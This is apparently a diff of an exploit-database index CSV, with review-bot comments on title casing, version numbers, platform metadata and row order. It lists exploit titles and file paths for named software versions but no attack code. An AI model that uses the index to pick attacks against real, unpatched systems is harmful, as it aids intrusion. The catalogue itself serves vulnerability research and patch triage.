10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow (Universal)",2009-12-04,"fl0 fl0w",windows,local,0
10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0
10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0
@ -8097,7 +8097,7 @@ id,file,description,date,author,platform,type,port
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0
31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2 / 4.4 ARM) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0
31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,windows,local,0
31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - '.pls' Buffer Overflow (Metasploit)",2014-02-13,Metasploit,windows,local,0
31667,platforms/windows/local/31667.txt,"Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0
@ -8186,7 +8186,7 @@ id,file,description,date,author,platform,type,port
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (SGID)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
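Review bot: Changing "(gid)" to "(SGID)" in row 33824 alters the technical meaning of the title rather than its formatting, since a group id and the set-group-ID bit are different things. Confirm against 33824.c which one the PoC relies on before merging.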
@ -9129,7 +9129,7 @@ id,file,description,date,author,platform,type,port
1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1787,platforms/windows/remote/1787.py,"FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
@ -9637,7 +9637,7 @@ id,file,description,date,author,platform,type,port
5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0
5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5751,platforms/windows/remote/5751.pl,"FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
@ -9835,7 +9835,7 @@ id,file,description,date,author,platform,type,port
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
@ -10428,8 +10428,8 @@ id,file,description,date,author,platform,type,port
16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution (Metasploit)",2010-07-25,Metasploit,solaris,remote,0
16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16329,platforms/solaris/remote/16329.rb,"Samba (Solaris) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0
16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0
16329,platforms/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0
16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0
16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit (Metasploit)",2010-06-22,Metasploit,windows,remote,0
16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote,0
@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port
16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
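Review bot: the casing fix on row 16461 (freeSSHd to FreeSSHd) leaves the adjacent row 16462, "freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)", in the lower-case form. If the same casing rule is meant to apply to freeFTPd, change it in this commit as well. Otherwise note in the commit message that the two product names are deliberately cased differently, so that case-sensitive title searches stay predictable.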
@ -10877,9 +10877,9 @@ id,file,description,date,author,platform,type,port
16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
16861,platforms/linux/remote/16861.rb,"Samba (Linux x86) - trans2open Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/linux/remote/16860.rb,"Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
16861,platforms/linux/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
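Review bot: the platform qualifier is still written two ways in the rewritten Samba titles, "(Linux/x86)" on row 16860 and "(Linux x86)" on row 16861. Since all three titles are being touched anyway to add the version and quote the function name, pick one form for the qualifier so that a single pattern matches every Samba Linux entry.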
@ -10893,12 +10893,12 @@ id,file,description,date,author,platform,type,port
16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
16873,platforms/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba (OSX/PPC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
16880,platforms/linux/remote/16880.rb,"Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
16880,platforms/linux/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
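Review bot: row 16880 is retitled "Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)" but its file path (platforms/linux/remote/16880.rb) and platform column both still say linux, so anyone filtering the CSV by platform will not find it under a BSD value. Either correct the platform metadata or explain the mismatch in the commit message. The trailing "Overflow Exploit" also differs from the plain "Overflow" used on the other trans2open rows (16876 here, 16861 and 16330 earlier) and could be aligned while the line is being edited.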
@ -11187,7 +11187,7 @@ id,file,description,date,author,platform,type,port
18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0
18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0
18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
18834,platforms/php/remote/18834.rb,"PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution (Metasploit)",2012-05-12,Metasploit,windows,remote,0
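Review bot: the new title on row 18834, "PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)", reads as if 5.3.12 and 5.4.2 are the affected releases, while the next row, 18836, describes the same class of issue as "PHP < 5.3.12 / < 5.4.2". The two rows should state the version boundary the same way. Check which is correct and use the "<" form on both if those versions are the fixed ones, because defenders triage patch status from these titles.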
@ -11274,7 +11274,7 @@ id,file,description,date,author,platform,type,port
19223,platforms/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0
19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,windows,remote,0
19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0
19231,platforms/windows/remote/19231.rb,"PHP - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0
19231,platforms/windows/remote/19231.rb,"PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0
19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump - Exploit",1996-08-03,"Jungseok Roh",solaris,remote,0
19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote,0
19239,platforms/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0
@ -12281,7 +12281,7 @@ id,file,description,date,author,platform,type,port
21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,java,remote,7001
21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0
21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,444
21850,platforms/linux/remote/21850.rb,"Samba - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0
21850,platforms/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0
21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000
21852,platforms/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,0
21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0
@ -12605,7 +12605,7 @@ id,file,description,date,author,platform,type,port
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
@ -12901,7 +12901,7 @@ id,file,description,date,author,platform,type,port
24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
24133,platforms/windows/remote/24133.rb,"FreeSSHD - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24133,platforms/windows/remote/24133.rb,"FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
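Review bot: row 24133 gains the version "FreeSSHd 1.2.6", but row 23080, edited earlier in this same patch, is titled "FreeSSHd 2.1.3 - Remote Authentication Bypass". If the Metasploit module covers the same authentication bypass, the two version strings should agree, and if they are separate issues the titles should say what distinguishes them. Please confirm the version against the exploit file before merging.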
@ -13519,7 +13519,7 @@ id,file,description,date,author,platform,type,port
28760,platforms/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0
28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0
28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0
28809,platforms/windows/remote/28809.rb,"HP LoadRunner - magentproc.exe Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443
28809,platforms/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443
28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution (Metasploit)",2013-10-08,Metasploit,unix,remote,0
28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0
28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote,0
@ -14753,7 +14753,7 @@ id,file,description,date,author,platform,type,port
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
37688,platforms/php/remote/37688.txt,"PHP - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
37688,platforms/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote,0
37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
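Review bot: row 37688 sits between 37655 and 37667, out of id order, and the retitle keeps it there. Since the line is being rewritten anyway, move it after 37671 (or wherever it belongs in the full sequence) so that the file stays sorted by id within the section and later diffs against it stay minimal.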
@ -15061,11 +15061,11 @@ id,file,description,date,author,platform,type,port
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
@ -15109,12 +15109,13 @@ id,file,description,date,author,platform,type,port
40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
